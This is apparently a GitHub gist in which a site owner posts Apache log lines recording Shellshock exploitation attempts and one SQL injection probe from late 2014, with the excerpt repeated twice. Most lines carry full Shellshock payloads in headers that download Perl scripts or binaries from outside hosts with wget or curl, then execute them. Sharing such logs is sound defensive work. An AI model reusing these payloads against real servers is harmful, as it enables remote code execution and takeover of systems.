brendano/gist:38302ee92645e3a16dbd

## gistfile1.txt
Shellshock attack attempts I noticed in apache logs, from grep '()' ... the shellshock-scan one I think I initiated but I think the rest are attack attempts.


209.126.230.72 - - [24/Sep/2014:22:55:07 -0400] "GET / HTTP/1.0" 301 - "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
94.228.220.68 - - [25/Sep/2014:01:17:15 -0400] "GET /index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,4,5,group_concat(0x3C6B65793E,version(),0x3C6B6579733E)-- HTTP/1.1" 200 31516 "-" "-"
89.207.135.125 - - [25/Sep/2014:06:59:58 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 302 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
198.20.69.74 - - [25/Sep/2014:17:14:32 -0400] "GET / HTTP/1.1" 301 - "() { :; }; /bin/ping -c 1 104.131.0.69" "() { :; }; /bin/ping -c 1 104.131.0.69"
54.251.83.67 - - [26/Sep/2014:15:55:50 -0400] "GET / HTTP/1.1" 301 - "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
114.91.105.103 - - [27/Sep/2014:09:36:34 -0400] "GET / HTTP/1.1" 301 - "-" "() { :;}; /bin/bash -c 'wget http://sts01.com/.../reg.sh -O /tmp/reg.sh && /bin/bash /tmp/reg.sh http://197.242.148.29:8088 66.228.39.121'"
188.138.33.11 - - [27/Sep/2014:11:02:02 -0400] "GET /cgi-sys/php5? HTTP/1.1" 404 210 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://94.102.63.238/shell.pl -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl\");'"
209.222.148.184 - - [28/Sep/2014:18:11:23 -0400] "GET /cgi-sys/php5 HTTP/1.1" 404 210 "-" "() { 0v3r1d3;};echo \"Content-type: text/plain\"; echo; uname -a;"
82.221.128.246 - - [29/Sep/2014:02:31:34 -0400] "GET / HTTP/1.1" 301 - "-" "() { :;}; /bin/bash -c \"wget http://82.221.105.197/bash-count.txt\""
74.112.131.246 - - [01/Oct/2014:22:19:59 -0400] "GET /blog/2009/09/dont-mawk-awk-the-fastest-and-most-elegant-big-data-munging-language/ HTTP/1.1" 200 20457 "-" "Mozilla/5.0 ()"
74.112.131.243 - - [01/Oct/2014:22:21:01 -0400] "GET /blog/2009/09/dont-mawk-awk-the-fastest-and-most-elegant-big-data-munging-language/ HTTP/1.1" 200 20456 "-" "Mozilla/5.0 ()"
54.213.225.160 - - [02/Oct/2014:17:22:16 -0400] "GET /?x=() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H;  HTTP/1.0" 301 233 "() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H;" "() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H;"
211.154.173.239 - - [03/Oct/2014:10:06:11 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 224 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget https://173.15.111.29/user --no-check-certificate;curl -O https://173.15.111.29/user -k ; perl /tmp/user;rm -rf /tmp/user\""
67.214.182.202 - - [03/Oct/2014:16:54:13 -0400] "GET /?x=() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; wget -O /var/tmp/sysinfo https://fs07n5.sendspace.com/dl/09a5e89fc7fadf22dd0318e37132e993/542eb2041a268d57/0r4nfb/sysinfo;chmod +x /var/tmp/sysinfo;/var/tmp/sysinfo HTTP/1.0" 301 233 "() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; wget -O /var/tmp/sysinfo https://fs07n5.sendspace.com/dl/09a5e89fc7fadf22dd0318e37132e993/542eb2041a268d57/0r4nfb/sysinfo;chmod +x /var/tmp/sysinfo;/var/tmp/sysinfo" "() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; wget -O /var/tmp/sysinfo https://fs07n5.sendspace.com/dl/09a5e89fc7fadf22dd0318e37132e993/542eb2041a268d57/0r4nfb/sysinfo;chmod +x /var/tmp/sysinfo;/var/tmp/sysinfo"
95.110.178.157 - - [04/Oct/2014:15:45:47 -0400] "GET /?x=() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; wget -O /tmp/404.cgi http://195.154.184.150/404.cgi;chmod 755 /tmp/404.cgi;/tmp/404.cgi;rm -rf /tmp/404.cgi* HTTP/1.0" 301 233 "() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; wget -O /tmp/404.cgi http://195.154.184.150/404.cgi;chmod 755 /tmp/404.cgi;/tmp/404.cgi;rm -rf /tmp/404.cgi*" "() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; wget -O /tmp/404.cgi http://195.154.184.150/404.cgi;chmod 755 /tmp/404.cgi;/tmp/404.cgi;rm -rf /tmp/404.cgi*"
24.160.166.96 - - [04/Oct/2014:22:52:31 -0400] "GET / HTTP/1.1" 200 31825 "-" "() { :;}; /bin/bash -c \"curl -O http://89.248.172.139/ha.pl -o /tmp/ha.pl; lwp-download -a http://89.248.172.139/ha.pl /tmp/ha.pl;wget http://89.248.172.139/ha.pl -O /tmp/ha.pl;perl /tmp/ha.pl;rm -f /tmp/ha.pl;mkdir /tmp/ha.pl\""
162.144.46.158 - - [05/Oct/2014:06:06:46 -0400] "GET /?x=() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; wget -O /tmp/404.cgi http://195.154.184.150/404.cgi;chmod 755 /tmp/404.cgi;/tmp/404.cgi;rm -rf /tmp/404.cgi* HTTP/1.0" 301 233 "() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; wget -O /tmp/404.cgi http://195.154.184.150/404.cgi;chmod 755 /tmp/404.cgi;/tmp/404.cgi;rm -rf /tmp/404.cgi*" "() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; wget -O /tmp/404.cgi http://195.154.184.150/404.cgi;chmod 755 /tmp/404.cgi;/tmp/404.cgi;rm -rf /tmp/404.cgi*"
	Shellshock attack attempts I noticed in apache logs, from grep '()' ... the shellshock-scan one I think I initiated but I think the rest are attack attempts.


	209.126.230.72 - - [24/Sep/2014:22:55:07 -0400] "GET / HTTP/1.0" 301 - "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
	94.228.220.68 - - [25/Sep/2014:01:17:15 -0400] "GET /index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,4,5,group_concat(0x3C6B65793E,version(),0x3C6B6579733E)-- HTTP/1.1" 200 31516 "-" "-"
	89.207.135.125 - - [25/Sep/2014:06:59:58 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 302 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
	198.20.69.74 - - [25/Sep/2014:17:14:32 -0400] "GET / HTTP/1.1" 301 - "() { :; }; /bin/ping -c 1 104.131.0.69" "() { :; }; /bin/ping -c 1 104.131.0.69"
	54.251.83.67 - - [26/Sep/2014:15:55:50 -0400] "GET / HTTP/1.1" 301 - "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
	114.91.105.103 - - [27/Sep/2014:09:36:34 -0400] "GET / HTTP/1.1" 301 - "-" "() { :;}; /bin/bash -c 'wget http://sts01.com/.../reg.sh -O /tmp/reg.sh && /bin/bash /tmp/reg.sh http://197.242.148.29:8088 66.228.39.121'"
	188.138.33.11 - - [27/Sep/2014:11:02:02 -0400] "GET /cgi-sys/php5? HTTP/1.1" 404 210 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://94.102.63.238/shell.pl -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl\");'"
	209.222.148.184 - - [28/Sep/2014:18:11:23 -0400] "GET /cgi-sys/php5 HTTP/1.1" 404 210 "-" "() { 0v3r1d3;};echo \"Content-type: text/plain\"; echo; uname -a;"
	82.221.128.246 - - [29/Sep/2014:02:31:34 -0400] "GET / HTTP/1.1" 301 - "-" "() { :;}; /bin/bash -c \"wget http://82.221.105.197/bash-count.txt\""
	74.112.131.246 - - [01/Oct/2014:22:19:59 -0400] "GET /blog/2009/09/dont-mawk-awk-the-fastest-and-most-elegant-big-data-munging-language/ HTTP/1.1" 200 20457 "-" "Mozilla/5.0 ()"
	74.112.131.243 - - [01/Oct/2014:22:21:01 -0400] "GET /blog/2009/09/dont-mawk-awk-the-fastest-and-most-elegant-big-data-munging-language/ HTTP/1.1" 200 20456 "-" "Mozilla/5.0 ()"
	54.213.225.160 - - [02/Oct/2014:17:22:16 -0400] "GET /?x=() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; HTTP/1.0" 301 233 "() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H;" "() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H;"
	211.154.173.239 - - [03/Oct/2014:10:06:11 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 224 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget https://173.15.111.29/user --no-check-certificate;curl -O https://173.15.111.29/user -k ; perl /tmp/user;rm -rf /tmp/user\""
	67.214.182.202 - - [03/Oct/2014:16:54:13 -0400] "GET /?x=() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; wget -O /var/tmp/sysinfo https://fs07n5.sendspace.com/dl/09a5e89fc7fadf22dd0318e37132e993/542eb2041a268d57/0r4nfb/sysinfo;chmod +x /var/tmp/sysinfo;/var/tmp/sysinfo HTTP/1.0" 301 233 "() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; wget -O /var/tmp/sysinfo https://fs07n5.sendspace.com/dl/09a5e89fc7fadf22dd0318e37132e993/542eb2041a268d57/0r4nfb/sysinfo;chmod +x /var/tmp/sysinfo;/var/tmp/sysinfo" "() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; wget -O /var/tmp/sysinfo https://fs07n5.sendspace.com/dl/09a5e89fc7fadf22dd0318e37132e993/542eb2041a268d57/0r4nfb/sysinfo;chmod +x /var/tmp/sysinfo;/var/tmp/sysinfo"
	95.110.178.157 - - [04/Oct/2014:15:45:47 -0400] "GET /?x=() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; wget -O /tmp/404.cgi http://195.154.184.150/404.cgi;chmod 755 /tmp/404.cgi;/tmp/404.cgi;rm -rf /tmp/404.cgi* HTTP/1.0" 301 233 "() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; wget -O /tmp/404.cgi http://195.154.184.150/404.cgi;chmod 755 /tmp/404.cgi;/tmp/404.cgi;rm -rf /tmp/404.cgi" "() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; wget -O /tmp/404.cgi http://195.154.184.150/404.cgi;chmod 755 /tmp/404.cgi;/tmp/404.cgi;rm -rf /tmp/404.cgi"
	24.160.166.96 - - [04/Oct/2014:22:52:31 -0400] "GET / HTTP/1.1" 200 31825 "-" "() { :;}; /bin/bash -c \"curl -O http://89.248.172.139/ha.pl -o /tmp/ha.pl; lwp-download -a http://89.248.172.139/ha.pl /tmp/ha.pl;wget http://89.248.172.139/ha.pl -O /tmp/ha.pl;perl /tmp/ha.pl;rm -f /tmp/ha.pl;mkdir /tmp/ha.pl\""
	162.144.46.158 - - [05/Oct/2014:06:06:46 -0400] "GET /?x=() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; wget -O /tmp/404.cgi http://195.154.184.150/404.cgi;chmod 755 /tmp/404.cgi;/tmp/404.cgi;rm -rf /tmp/404.cgi* HTTP/1.0" 301 233 "() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; wget -O /tmp/404.cgi http://195.154.184.150/404.cgi;chmod 755 /tmp/404.cgi;/tmp/404.cgi;rm -rf /tmp/404.cgi" "() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; wget -O /tmp/404.cgi http://195.154.184.150/404.cgi;chmod 755 /tmp/404.cgi;/tmp/404.cgi;rm -rf /tmp/404.cgi"